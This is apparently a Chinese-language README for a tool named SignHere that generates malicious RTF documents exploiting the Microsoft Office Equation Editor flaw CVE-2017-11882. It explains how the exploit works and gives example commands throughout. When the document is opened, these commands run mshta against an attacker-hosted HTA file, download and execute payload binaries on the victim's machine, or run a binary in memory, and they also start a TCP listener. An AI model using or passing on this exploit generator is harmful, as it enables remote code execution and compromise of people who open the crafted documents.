CVE-2017-11882——Microsoft Office 2007 Service Pack 3、Microsoft Office 2010 Service Pack 2、Microsoft Office 2013 Service Pack 1 和 Microsoft Office 2016 的独特漏洞标识符,允许攻击者在当前用户的上下文中运行代码,原因是未正确处理内存中的对象,即所谓的“Microsoft Office 内存损坏漏洞”。 该实现包括创建用于构建恶意 rtf 文档和 VBScript 中 payload 的程序。
rtf 文档之所以存在漏洞,是因为可以通过了解特殊命令(RTF 头部)来对其进行“编程”。因此,在文档正文中创建了一个二进制(可执行)对象,实际上它是一个包含 cmd 命令代码的 Microsoft Equation 公式。然后可以在 VBScript 中生成 payload,并使用命令“mshta 指向 payload 文件的链接”来执行 hta 文件。
作者和贡献者不对对您或由您造成的任何损害负责。
您可以使用 Termux,但执行程序需要 root 权限
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
首先,您需要下载压缩包。然后解压缩,在该文件夹中打开 PowerShell 窗口并输入:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd 参数:在打开文档后执行的 Windows 命令。
--powershell 参数:将在 VBScript payload 中使用的 powershell 命令。
--ip 参数:用于 Web 服务器的 IP 地址。(默认值:127.0.0.1)
--output 文档的名称和路径。
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp 参数:将二进制文件用作 payload(二进制文件将在 RAM 内存中启动)。
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload 参数:将文件下载到受害者计算机并执行。
--listener-host 参数:在当前 IP 上启动 TCP 监听器。(默认值:127.0.0.1)